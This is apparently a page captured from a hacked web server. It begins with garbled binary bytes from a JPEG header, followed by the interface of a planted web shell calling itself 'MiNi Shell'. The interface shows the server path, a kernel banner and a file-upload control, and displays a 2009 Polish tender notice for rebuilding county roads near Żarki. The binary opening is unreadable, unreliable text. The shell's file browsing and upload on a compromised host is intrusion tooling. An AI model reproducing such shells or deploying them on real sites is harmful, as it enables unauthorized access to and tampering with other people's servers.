JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090821/137715-N-2009.html

<p class="kh_header"><b>Żarki: Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki</b><br>
<b>Numer ogłoszenia: 137715 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Myszkowie , ul. Myszkowska 59, 42-310 Żarki, woj. śląskie, tel. 034 3148304, faks 034 3148304.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myszkow.pzd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg powiatowych:  Nr 1711S odcinek miejscowości Bliżyce od skrzyżowania z DP 3807S - do granicy powiatu zawierciańskiego oraz odcinek drogi powiatowej Nr 3807S Bliżyce -Sokolniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację zakresu rzeczowego robót budowlanych - drogowych polegających na wykonaniu przebudowy drogi powiatowej nr 1711S  odcinek od skrzyżowania z drogą powiatową nr 3807S w miejscowości Bliżyce - do granicy powiatu myszkowskiego z powiatem zawierciańskim  od km 1+452,87 do km 5+195,37 oraz łącznik droga powiatowa nr 3807S Bliżyce -Sokolniki od km 0+000 do km 0+657,50
1. Zakres przebudowy  obejmuje roboty drogowe  na odcinku 4,400  km zgodnie z  przedmiarem robót,  specyfikacjami wykonania i odbioru robót : 
 Roboty przygotowawcze obejmują: 
 - rozbiórki wjazdów wraz z przepustami 
 -  wycinkę kolidujących drzew
 -  rozebranie i zasypanie studni czerpalnej
 -  odwóz materiałów z rozbiórki i wycinki
 Roboty ziemne obejmują:
 -  zdjęcie warstwy humusu ( do wykorzystania w robotach wykończeniowych ) 
 -  mechaniczne wykonanie wykopów i nasypów  
 Roboty nawierzchniowe obejmują: 
 - wykonanie warstw konstrukcyjnych nośnych na poszerzeniach
 - wykonanie podbudowy bitumicznej 
 - wzmocnienie połączeń istniejącej jezdni i poszerzeń geosiatką 
 - wykonanie warstwy ścieralnej z betonu asfaltowego
 Budowa wjazdów i chodników obejmuje: 
 -  wykonanie podbudowy tłuczniowej  
 - wykonanie nawierzchni z kostki brukowej betonowej
 Budowa odwodnienia obejmuje: 
 -  budowę nowych lub przedłużenie istniejących przepustów pod koroną jezdni
 -  budowę przepustów pod wjazdami 
 -  budowę ścieku z elementów prefabrykowanych
 -  budowę rowów wraz z umocowaniem
 -  wykonanie obudowy wylotów elementów odwodnienia do rowu
 Roboty porządkowe i elementy bezpieczeństwa ruchu obejmują :
 -  budowę poręczy i barier energochłonnych na przebudowanym przepuście
 -  oznakowanie pionowe i poziome
 -  regulację pionową zasuw wodociągowych
 -  montaż rur osłonowych
 -  humusowanie obrzeży robót wraz z obsianiem trawą.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7, 45.23.32.33-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu :  120.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
 
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają  obowiązek posiadania takich uprawnień; 

2. Posiadają niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami      
 zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do 
 udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

a)  wykonawca musi dysponować osobami posiadającymi: 
     - uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności 
       drogowej. Należącymi do Okręgowej Izby Inżynierów  Budownictwa.

b)    wykonawca musi wykazać, że  w ciągu ostatnich pięciu  lat przed wszczęciem postępowania 
       o  udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności jest krótszy - 
       w tym okresie,  wykonał  minimum  2 roboty budowlane polegające na przebudowie dróg 
       publicznych odpowiadających swoim rodzajem przedmiotowi zamówienia  o wartości minimum 
       5.000.000,00 zł (brutto) każda, z podaniem ich  wartości  oraz daty i miejsca wykonania.
      Do każdego wykazanego zadania należy dołączyć dokument , że roboty zostały wykonane 
      należycie. Dokumenty należy  przedstawić w kolejności zgodnej z wykazem.
 Przez roboty odpowiadające swoim rodzajem przedmiotowi zamówienia rozumie się 
       przebudowę dróg publicznych polegających na wykonaniu robót z zakresu wykonania 
nawierzchni bitumicznych wraz z chodnikami.

c)    wykonawca musi  wykazać  niezbędne do wykonania zamówienia narzędzia i urządzeń  jakimi 
  dysponuje lub  będzie dysponował wykonawca wykaże sprzęt i urządzenia  własne i obce (np.
  dzierżawione, wylesingowane itp.) , które będzie używał przy realizacji zamówienia, przy czym
       wykonawca  musi wykazać minimum posiadania:  

                   - walec drogowy stalowy wibracyjny 8-10T   - 1 szt
                   - walec drogowy gumowo-stalowy               -  1 szt 
                   - skrapiarka samojezdna do bitumu              - 1 szt         
                   - samochody samowyładowcze min 10 T wyposażone w plandeki     -  4 szt 
                   - szczotka mechaniczna (bez ciągnika) -         1 szt 
                   - rozkładarka mas bitumicznych wyposażona w elektroniczny układ kontroli równości i   
                     ubijaki  zagęszczające                            -      1szt
                   -  frezarka                                                 -       1szt      
                   - wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100Mg/godz. z 
                     automatycznym  zespołem sterowania procesem produkcji, własna lub  umowa 
                     podpisana z taką wytwórnią na obsługę  przedmiotu zamówienia ;

d)   przedstawić pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do 
wykonania zamówienia narzędzi lub urządzeń, jeżeli w wykazie ,o którym mowa w pkt c, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował, 

e)   wykonawca musi wykazać  osoby, którymi dysponuje lub będzie dysponował i które będą 
uczestniczyć w wykonaniu zamówienia, wykonawca poda imiona i nazwiska: kierownika budowy,
oraz inne osoby przewidziane do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych ,  doświadczenia i wykształcenia oraz uprawnień niezbędnych do wykonania zamówienia.

f)    przedstawić pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
 wykonania  zamówienia, jeżeli w wykazie, o którym mowa w pkt e , wykonawca wskazał osoby,
 którymi będzie dysponował 

g)  wykonawca musi wykazać podmioty, które będą uczestniczyć w wykonywaniu zamówienia, 
 wykonawca poda nazwy i adresy firm, które przewidywane będą do wykonania zamówienia jako
 podmioty występujące wspólnie, jeżeli jest to przewidziane , określając zakres robót   przewidzianych do wykonania przez  podwykonawców 
 
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

a)  wykonawca będzie posiadał aktualnie obowiązującą  polisę ubezpieczenia o wartości
      min. 4.000.000,00 PLN lub inny dokument potwierdzający, że jest on ubezpieczony 
      od odpowiedzialności cywilnej, w zakresie   prowadzonej działalności;

4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia art.24 ust.1 i 2 PZP;

Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oferty i dokumentów  
załączonych do oferty. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem   wykonawcy z postępowania . Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca musi złożyć:                           

1. Wypełniony formularz oferty z wykorzystaniem wzoru  -  załącznik Nr 1 ;

2. Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia - wzór 
    dokumentu załączony jest do SIWZ - załącznik Nr 2

3. W celu potwierdzenia ,że Wykonawca posiada uprawnienia do wykonywania określonej działalności
    lub czynności, Zamawiający żąda :
       a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
           działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
           do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed 
           upływem  terminu składania ofert.
    
     b)  aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału
           Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
           potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz 
           składek na ubezpieczenie  zdrowotne lub społeczne, lub zaświadczenia, że uzyskał 
           przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
           wstrzymanie w całości  wykonania decyzji właściwego  organu - wystawione nie wcześniej niż 3 
           miesiące przed upływem terminu składania ofert.
  
c)	 aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie  
właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
określonym w art. 24  ust. 1 pkt 4-8 - Prawo zamówień Publicznych (na temat karalności wykonawcy) ,wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
    
  d)  aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9
            w/w ustawy ( na temat karalności podmiotów zbiorowych), wystawioną nie wcześniej  niż 6 
            miesięcy  przed upływem terminu składania ofert. 

4. W celu potwierdzenia ,że Wykonawca posiada  niezbędną wiedzę i doświadczenie oraz dysponuje
    potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób
    zdolnych do   wykonania zamówienia , Zamawiający żąda ;
      a) w wykazie  zrealizowanych robót budowlanych w ciągu ostatnich pięciu  lat przed wszczęciem 
          postępowania o  udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności 
          jest krótszy -  w tym okresie, który należy załączyć do oferty , będą wykonane  minimum
          2 zadania  odpowiadające swoim rodzajem przedmiotowi zamówienia  o wartości minimum  
          5.000.000,00 zł (brutto) każda, z podaniem ich  wartości  oraz daty i miejsca wykonania 
          - na lub wg druku stanowiącego Załącznik Nr 3 do SIWZ      
          Do każdego wykazanego zadania należy dołączyć dokument , że roboty zostały wykonane 
          należycie. Dokumenty należy przedstawić w kolejności zgodnej z wykazem.
          Przez roboty odpowiadające swoim rodzajem przedmiotowi zamówienia rozumie się 
          przebudowę dróg publicznych polegających na wykonaniu robót z zakresu wykonania 
          nawierzchni bitumicznych wraz  z chodnikami.
     
     b)  w wykazie  niezbędnych do wykonania zamówienia narzędzi i urządzeń  jakimi dysponuje lub 
          będzie dysponował wykonawca, który należy  załączyć do oferty , wykonawca wykaże sprzęt i 
          urządzenia  własne i obce(np. dzierżawione, wylesingowane itp.) , które będzie używał przy  
          realizacji zamówienia, przy czym  wykonawca  musi wykazać minimum posiadania:  
                   - walec drogowy stalowy wibracyjny 8-10T   - 1 szt
                   - walec drogowy gumowo-stalowy               - 1 szt 
                   - skrapiarka samojezdna do bitumu              - 1 szt         
                   - samochody samowyładowcze min 10 T wyposażone w plandeki     -  4 szt 
                   - szczotka mechaniczna (bez ciągnika) -         1 szt 
                   - rozkładarka mas bitumicznych wyposażona w elektroniczny układ kontroli równości
                     i ubijaki  zagęszczające                               - 1szt
                   -  frezarka                                                      - 1szt      
                   - wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100Mg/godz 
                     z automatycznym zespołem sterowania procesem produkcji, własna lub  umowa
                     podpisana z taką wytwórnią na obsługę  przedmiotu zamówienia   na  lub wg 
                     druku  stanowiącego Załącznik Nr 4  do SIWZ
    
     c)  pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania 
         zamówienia narzędzi lub urządzeń, jeżeli w wykazie ,o którym mowa w pkt b, wykonawca 
         wskazał narzędzia i urządzenia, którymi będzie dysponował, będzie wynikało, że podmioty 
         udostępnią niezbędne narzędzia i urządzenia  na okres realizacji przedmiotu zamówienia;
        
  d)   w wykazie osób, wykonawca musi wykazać  osoby, którymi dysponuje lub będzie dysponował
        i które będą uczestniczyć w wykonaniu zamówienia, wykonawca poda imiona i nazwiska:
        kierownika budowy, oraz innych osób przewidzianych do wykonania zamówienia, wraz
        z informacjami na temat ich kwalifikacji zawodowych ,  doświadczenia i wykształcenia
        oraz uprawnień niezbędnych do wykonania zamówienia na lub wg  dokumentu stanowiącego  
        Załącznik Nr 5 do SIWZ; 

e)  dokumenty stwierdzające, że  kierownik budowy do kierowania i nadzorowania robót 
        budowlanych  posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek
        posiadania takich uprawnień, tj. dokumenty potwierdzające uprawnienia zawodowe - 
        uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w 
        specjalności  drogowej, oraz dokument stwierdzający , że jest on aktualnym członkiem 
        Izby Inżynierów Budownictwa i jest ubezpieczony od odpowiedzialności  cywilnej w zakresie 
         pełnionej funkcji;

f)   z pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania
        zamówienia, jeżeli w wykazie, którym mowa w pkt d , wykonawca wskazał osoby, którymi będzie 
        dysponował , będzie wynikało ,że podmioty udostępnią osoby zdolne do wykonania zamówienia 
        w terminie realizacji przedmiotu zamówienia;

g)  w wykazie podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, załączonym do 
        oferty wykonawca poda nazwy i adresy firm, które przewidywane będą do wykonania 
        zamówienia jako podmioty występujące wspólnie, jeżeli jest to przewidziane , określając zakres
        robót przewidzianych do wykonania przez  podwykonawców - wzór dokumentu stanowi 
        Załącznik Nr 6  do SIWZ; 

5. W celu potwierdzenia , że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej
 zapewniającej  wykonanie zamówienia, Zamawiający żąda :

a)	polisę ubezpieczenia o wartości min.4.000.000 PLN lub inny dokument potwierdzający, że jest 
      on  ubezpieczony od odpowiedzialności cywilnej, w zakresie   prowadzonej działalność zgodnej
      z  przedmiotem zamówienia;

6. Jeżeli wykonawcy wspólnie ubiegają się o zamówienie ( konsorcjum) mają obowiązek złożyć każdy 
    z   osobna dokumenty wymienione  w Rozdziale VI  pkt 2 , pkt 3 a),b),c), d) SIWZ
    Do oferty należy dołączyć:
a)	pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o  udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
       zamówienia   publicznego,
    b)  w przypadku złożenia oferty przez spółkę cywilną zmawiający wymaga złożenia kopii umowy
         spółki. O ile nie jest uregulowane w umowie spółki należy dołączyć uchwałę uczestników w 
         sprawie  reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
        w postępowaniu i  zawarcia umowy w sprawie zamówienia publicznego.  
Dokumenty, o których mowa  w Rozdziale VI pkt 3 ppkt a)  i ppkt c) SIWZ powinny być wystawione na każdego ze wspólników spółki z osobna , natomiast dokumenty z pkt 3 ppkt b rozdziału VI SIWZ na na każdego ze wspólników i na spółkę cywilną. Oświadczenie o spełnieniu warunków udziału w postępowaniu ( Załącznik Nr 2  do SIWZ) ma obowiązek złożyć każdy ze wspólników spółki cywilnej.

W przypadku wyboru przez zamawiającego oferty złożonej przez konsorcjum , wykonawcy tworzący konsorcjum zobowiązani będą najpóżniej przed zawarciem umowy w sprawie zamówienia publicznego  do przedłożenia umowy konsorcjum.
Wszelkie korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum. 

7. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,     zamiast dokumentów, o których mowa w pkt. 3, ppkt  a),b),c),d)  SIWZ  składa dokumenty o których mowa w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów , jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.(Dz.U.Nr 87,poz.605 z póż. zmnianami) .

8. Dowód wniesienia wadium bądź dokument świadczący o zabezpieczeniu wadium;
9. Zaakceptowany projekt umowy stanowiący załącznik do SIWZ. -  załącznik Nr 7;

W/w dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawidłowości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzd.myszkow .pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Myszkowie z/s w Żarkach
	ul. Myszkowska 59 ,  42-310 Żarki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Myszkowie           z/s w Żarkach ul. Myszkowska 59, 42-310 Żarki  (sekretariat)-pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze Środków Unii europejskiej w ramach 
REGIONALNEGO PROGRAMU operacyjnego Województwa Śląskiego na lata 2007-2013  Priorytet VII Transport

Creat By MiNi SheLL
Email: jattceo@gmail.com